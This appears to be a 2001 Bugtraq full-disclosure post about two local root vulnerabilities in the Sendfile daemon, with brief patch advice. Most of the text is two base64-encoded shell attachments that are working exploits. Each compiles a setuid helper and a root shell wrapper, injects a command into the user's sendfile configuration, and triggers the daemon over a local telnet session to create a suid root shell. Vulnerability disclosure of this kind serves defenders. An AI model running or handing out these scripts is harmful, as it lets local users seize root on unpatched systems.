[20641] in bugtraq
Sendfile daemon bugs
daemon@ATHENA.MIT.EDU (psheep@hushmail.com)
Tue May 15 20:35:31 2001
From: psheep@hushmail.com
Message-Id: <200105151508.IAA23819@user8.hushmail.com>
Date: Tue, 15 May 2001 09:10:49 -0700 (MDT)
To: bugtraq@securityfocus.com
Mime-version: 1.0
Content-type: multipart/mixed; boundary="Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC"
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-type: text/plain
I have attached two simple scripts which exploit vulnerabilities which exist
in the some versions of the Sendfile daemon, both allow a local attacker
to gain superuser privileges.
The bug exploited by sfdfwd.sh was supposed to have been fixed by the patches
provided in Debian Security Advisory DSA-050-1 and then DSA-052-1 and was
reported by Colin Phipps in November 2000, somehow it has still not been
fixed. The second bug has been reported (without any success) to Debian,
it is the result of a serialization error combined with a lack of error
checking.
Anyone using this package should download the most recent copy of the source
code directly from the author's site and manually compile it, or apply the
patch used in Debian-unstable (sendfile_2.1-25). Up-to-date copies of the
source can be obtained from ftp://ftp.belwue.de/pub/unix/sendfile/current
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-Disposition: attachment
Content-type: application/octet-stream; name="sfdfwd.sh"
Content-Transfer-Encoding: base64
IyEvYmluL3NoCiMKIyBzZmRmd2QgLSBTZW5kZmlsZSBkYWVtb24gbG9jYWwgYXJiaXRy
YXJ5IGNvbW1hbmQgZXhlY3V0aW9uIHZ1bG5lcmFiaWxpdHkgCiMKIyByZWZlcmVuY2Vz
OgojICAgaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9iaWQvMjY0NQojICAgaHR0
cDovL2J1Z3MuZGViaWFuLm9yZy9jZ2ktYmluL2J1Z3JlcG9ydC5jZ2k/YnVnPTc2MDQ4
CiMKIyAwNC8yNC8wMSBwc2hlZXAKClNGVVNFUj0kVVNFUgpTRkhPU1Q9bG9jYWxob3N0
ClNGUE9SVD1zYWZ0ClNGU1BPT0w9L3Zhci9zcG9vbC9zZW5kZmlsZQpTRlVTRVJDRkc9
IiRTRlNQT09MLyRTRlVTRVIvY29uZmlnL2NvbmZpZyIKCmVjaG8gIlNlbmRmaWxlIGRh
ZW1vbiBsb2NhbCBhcmJpdHJhcnkgY29tbWFuZCBleGVjdXRpb24gZXhwbG9pdCIKZWNo
bwplY2hvICIgIHVzZXJuYW1lICAgICAgICA9ICRTRlVTRVIiCmVjaG8gIiAgc3Bvb2wg
ZGlyZWN0b3J5ID0gJFNGU1BPT0wiCmVjaG8gIiAgY29uZmlnIGZpbGUgICAgID0gJFNG
VVNFUkNGRyIKZWNobyAiICB0YXJnZXQgaG9zdG5hbWUgPSAkU0ZIT1NUIgplY2hvICIg
IHRhcmdldCBwb3J0ICAgICA9ICRTRlBPUlQiCmVjaG8KCmlmICEgdGVzdCAtZCAkU0ZT
UE9PTDsgdGhlbgogIGVjaG8gIioqIHVuYWJsZSB0byBsb2NhdGUgdGhlIHNlbmRmaWxl
IHNwb29sIGRpcmVjdG9yeSwgZXhpdGluZyIKICBleGl0IDEKZmkKCnNmc2F2ZWRjZmc9
Im5vIgoKaWYgISB0ZXN0IC1kICRTRlNQT09MLyRTRlVTRVIgfHwgISB0ZXN0IC1kICRT
RlNQT09MLyRTRlVTRVIvY29uZmlnOyB0aGVuCiAgZWNobyAiKiogYXR0ZW1wdGluZyB0
byBjcmVhdGUgc2VuZGZpbGUgc3Bvb2wgZGlyZWN0b3J5IGZvciAkU0ZVU0VSIgogIGVj
aG8KICAoc2xlZXAgMTtlY2hvICJUTyAkU0ZVU0VSIjtzbGVlcCAyKSB8IHRlbG5ldCAk
U0ZIT1NUICRTRlBPUlQKICBlY2hvCmVsc2UKICBpZiB0ZXN0IC1mICRTRlVTRVJDRkc7
IHRoZW4KICAgIGVjaG8gIioqIGJhY2tpbmcgdXAgeW91ciBzZW5kZmlsZSBkYWVtb24g
Y29uZmlndXJhdGlvbiBmaWxlIgogICAgbXYgJFNGVVNFUkNGRyAkU0ZTUE9PTC8kU0ZV
U0VSL2NvbmZpZy9jb25maWcudG1wCiAgICBzZnNhdmVkY2ZnPSJ5ZXMiCiAgZmkKZmkK
CmNhdCA+IHNmZGZ3ZC5jIDw8IEVPRgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRl
IDxzdGRsaWIuaD4KCmludCBtYWluKCkgewogICAgc2V0cmV1aWQoMCwwKTsKICAgIHNl
dGdpZCgwKTsKICAgIHN5c3RlbSgiY2hvd24gcm9vdC5yb290ICRQV0Qvc2Zkc2g7Y2ht
b2QgNDc1NSAkUFdEL3NmZHNoIik7Cn0KRU9GCgpjYXQgPiBzZmRzaC5jIDw8IEVPRgoj
aW5jbHVkZSA8dW5pc3RkLmg+CgppbnQgbWFpbigpIHsKICAgIHNldHJldWlkKDAsMCk7
CiAgICBzZXRnaWQoMCk7CiAgICBleGVjbCgiL2Jpbi9zaCIsICJzaCIsIE5VTEwpOwp9
CkVPRgoKZWNobyAiKiogY29tcGlsaW5nIGhlbHBlciBhcHBsaWNhdGlvbiBhcyAkUFdE
L3NmZGZ3ZCIKY2MgLW8gJFBXRC9zZmRmd2QgJFBXRC9zZmRmd2QuYwoKaWYgISB0ZXN0
IC14ICRQV0Qvc2ZkZndkOyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRpb24gZmFpbGVk
LCBleGl0aW5nIgogIGV4aXQgMQpmaQoKZWNobyAiKiogY29tcGlsaW5nIHNoZWxsIHdy
YXBwZXIgYXMgJFBXRC9zZmRzaCIKY2MgLW8gJFBXRC9zZmRzaCAkUFdEL3NmZHNoLmMK
CmlmICEgdGVzdCAteCAkUFdEL3NmZHNoOyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRp
b24gZmFpbGVkLCBleGl0aW5nIgogIGV4aXQgMQpmaQoKZWNobyAiKiogaW5zZXJ0aW5n
IGNvbW1hbmRzIGludG8gdGVtcG9yYXJ5IGNvbmZpZ3VyYXRpb24gZmlsZSIKZWNobyAi
Zm9yd2FyZCA9IHwkUFdEL3NmZGZ3ZCIgPiRTRlVTRVJDRkcKCmVjaG8gIioqIGF0dGVt
cHRpbmcgYXR0YWNrIGFnYWluc3Qgc2VuZGZpbGUgZGFlbW9uLi4uIgplY2hvCgooc2xl
ZXAgMTtjYXQgPDwgRU9GCkZST00gJFVTRVIKVE8gJFVTRVIKRklMRSBib29tJFJBTkRP
TQpTSVpFIDAgMApEQVRBClFVSVQKRU9GCnNsZWVwIDIpIHwgdGVsbmV0ICRTRkhPU1Qg
JFNGUE9SVAplY2hvCgppZiB0ZXN0ICJ4JHNmc2F2ZWRjZmciID0geHllczsgdGhlbgog
IGVjaG8gIioqIHJlc3RvcmluZyBiYWNrZWQgdXAgY29uZmlndXJhdGlvbiBmaWxlIgog
IG12ICRTRlNQT09MLyRTRlVTRVIvY29uZmlnL2NvbmZpZy50bXAgJFNGVVNFUkNGRwpl
bHNlCiAgZWNobyAiKiogcmVtb3ZpbmcgdGVtcG9yYXJ5IGNvbmZpZ3VyYXRpb24gZmls
ZSIKICBybSAkU0ZVU0VSQ0ZHCmZpCgplY2hvICIqKiBkb25lLCB0aGUgc2hlbGwgd3Jh
cHBlciBzaG91bGQgYmUgc3VpZCByb290IgplY2hvCmV4aXQgMQo=
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-Disposition: attachment
Content-type: application/octet-stream; name="sfdnfy.sh"
Content-Transfer-Encoding: base64
IyEvYmluL3NoCiMKIyBzZmRuZnkgLSBTZW5kZmlsZSBkYWVtb24gbG9jYWwgYXJiaXRy
YXJ5IGNvbW1hbmQgZXhlY3V0aW9uIHZ1bG5lcmFiaWxpdHkKIwojIHJlZmVyZW5jZXM6
CiMgICBodHRwOi8vd3d3LnNlY3VyaXR5Zm9jdXMuY29tL2JpZC8yNjUyCiMgICBodHRw
Oi8vd3d3LnNlY3VyaXR5Zm9jdXMuY29tL2JpZC8yNjMxCiMKIyAwNC8yNC8wMSBwc2hl
ZXAKClNGVVNFUj0kVVNFUgpTRkhPU1Q9bG9jYWxob3N0ClNGUE9SVD1zYWZ0ClNGU1BP
T0w9L3Zhci9zcG9vbC9zZW5kZmlsZQpTRlVTRVJDRkc9IiRTRlNQT09MLyRTRlVTRVIv
Y29uZmlnL2NvbmZpZyIKCmVjaG8gIlNlbmRmaWxlIGRhZW1vbiBsb2NhbCBhcmJpdHJh
cnkgY29tbWFuZCBleGVjdXRpb24gdnVsbmVyYWJpbGl0eSIKZWNobwplY2hvICIgIHVz
ZXJuYW1lICAgICAgICA9ICRTRlVTRVIiCmVjaG8gIiAgc3Bvb2wgZGlyZWN0b3J5ID0g
JFNGU1BPT0wiCmVjaG8gIiAgY29uZmlnIGZpbGUgICAgID0gJFNGVVNFUkNGRyIKZWNo
byAiICB0YXJnZXQgaG9zdG5hbWUgPSAkU0ZIT1NUIgplY2hvICIgIHRhcmdldCBwb3J0
ICAgICA9ICRTRlBPUlQiCmVjaG8KCmlmICEgdGVzdCAtZCAkU0ZTUE9PTDsgdGhlbgog
IGVjaG8gIioqIHVuYWJsZSB0byBsb2NhdGUgdGhlIHNlbmRmaWxlIHNwb29sIGRpcmVj
dG9yeSwgZXhpdGluZyIKICBleGl0IDEKZmkKCnNmc2F2ZWRjZmc9Im5vIgoKaWYgISB0
ZXN0IC1kICRTRlNQT09MLyRTRlVTRVIgfHwgISB0ZXN0IC1kICRTRlNQT09MLyRTRlVT
RVIvY29uZmlnOyB0aGVuCiAgZWNobyAiKiogYXR0ZW1wdGluZyB0byBjcmVhdGUgc2Vu
ZGZpbGUgc3Bvb2wgZGlyZWN0b3J5IGZvciAkU0ZVU0VSIgogIGVjaG8KICAoc2xlZXAg
MTtlY2hvICJUTyAkU0ZVU0VSIjtzbGVlcCAyKSB8IHRlbG5ldCAkU0ZIT1NUICRTRlBP
UlQKICBlY2hvCmVsc2UKICBpZiB0ZXN0IC1mICRTRlVTRVJDRkc7IHRoZW4KICAgIGVj
aG8gIioqIGJhY2tpbmcgdXAgeW91ciBzZW5kZmlsZSBkYWVtb24gY29uZmlndXJhdGlv
biBmaWxlIgogICAgbXYgJFNGVVNFUkNGRyAkU0ZTUE9PTC8kU0ZVU0VSL2NvbmZpZy9j
b25maWcudG1wCiAgICBzZnNhdmVkY2ZnPSJ5ZXMiCiAgZmkKZmkKCmNhdCA+IHNmZG5m
eS5jIDw8IEVPRgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4K
CmludCBtYWluKCkgewogICAgc2V0cmV1aWQoMCwwKTsKICAgIHNldGdpZCgwKTsKICAg
IHN5c3RlbSgiY2hvd24gcm9vdC5yb290ICRQV0Qvc2Zkc2g7Y2htb2QgNDc1NSAkUFdE
L3NmZHNoIik7Cn0KRU9GCgpjYXQgPiBzZmRzaC5jIDw8IEVPRgojaW5jbHVkZSA8dW5p
c3RkLmg+CgppbnQgbWFpbigpIHsKICAgIHNldHJldWlkKDAsMCk7CiAgICBzZXRnaWQo
MCk7CiAgICBleGVjbCgiL2Jpbi9zaCIsICJzaCIsIE5VTEwpOwp9CkVPRgoKZWNobyAi
KiogY29tcGlsaW5nIGhlbHBlciBhcHBsaWNhdGlvbiBhcyAkUFdEL3NmZG5meSIKY2Mg
LW8gJFBXRC9zZmRuZnkgJFBXRC9zZmRuZnkuYwoKaWYgISB0ZXN0IC14ICRQV0Qvc2Zk
bmZ5OyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRpb24gZmFpbGVkLCBleGl0aW5nIgog
IGV4aXQgMQpmaQoKZWNobyAiKiogY29tcGlsaW5nIHNoZWxsIHdyYXBwZXIgYXMgJFBX
RC9zZmRzaCIKY2MgLW8gJFBXRC9zZmRzaCAkUFdEL3NmZHNoLmMKCmlmICEgdGVzdCAt
eCAkUFdEL3NmZHNoOyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRpb24gZmFpbGVkLCBl
eGl0aW5nIgogIGV4aXQgMQpmaQoKZWNobyAiKiogaW5zZXJ0aW5nIGNvbW1hbmRzIGlu
dG8gdGVtcG9yYXJ5IGNvbmZpZ3VyYXRpb24gZmlsZSIKZWNobyAibm90aWZpY2F0aW9u
ID0gbWFpbCAkVVNFUjskUFdEL3NmZG5meSIgPiRTRlVTRVJDRkcKCmVjaG8gIioqIGF0
dGVtcHRpbmcgYXR0YWNrIGFnYWluc3Qgc2VuZGZpbGUgZGFlbW9uLi4uIgplY2hvCgoo
c2xlZXAgMTtjYXQgPDwgRU9GCkZST00gJFVTRVIKVE8gJFVTRVIKRklMRSBib29tJFJB
TkRPTQpTSVpFIDAgMApEQVRBCkZJTEUgYm9vbSRSQU5ET00KU0laRSAxIDAKREFUQQpF
T0YKc2xlZXAgMikgfCB0ZWxuZXQgJFNGSE9TVCAkU0ZQT1JUCmVjaG8KCmlmIHRlc3Qg
Ingkc2ZzYXZlZGNmZyIgPSB4eWVzOyB0aGVuCiAgZWNobyAiKiogcmVzdG9yaW5nIGJh
Y2tlZCB1cCBjb25maWd1cmF0aW9uIGZpbGUiCiAgbXYgJFNGU1BPT0wvJFNGVVNFUi9j
b25maWcvY29uZmlnLnRtcCAkU0ZVU0VSQ0ZHCmVsc2UKICBlY2hvICIqKiByZW1vdmlu
ZyB0ZW1wb3JhcnkgY29uZmlndXJhdGlvbiBmaWxlIgogIHJtICRTRlVTRVJDRkcKZmkK
CmVjaG8gIioqIGRvbmUsIHRoZSBzaGVsbCB3cmFwcGVyIHNob3VsZCBiZSBzdWlkIHJv
b3QgYWZ0ZXIgdGhlIG1haWxlciBpcyBkb25lIgplY2hvCmV4aXQgMQo=
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC--
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
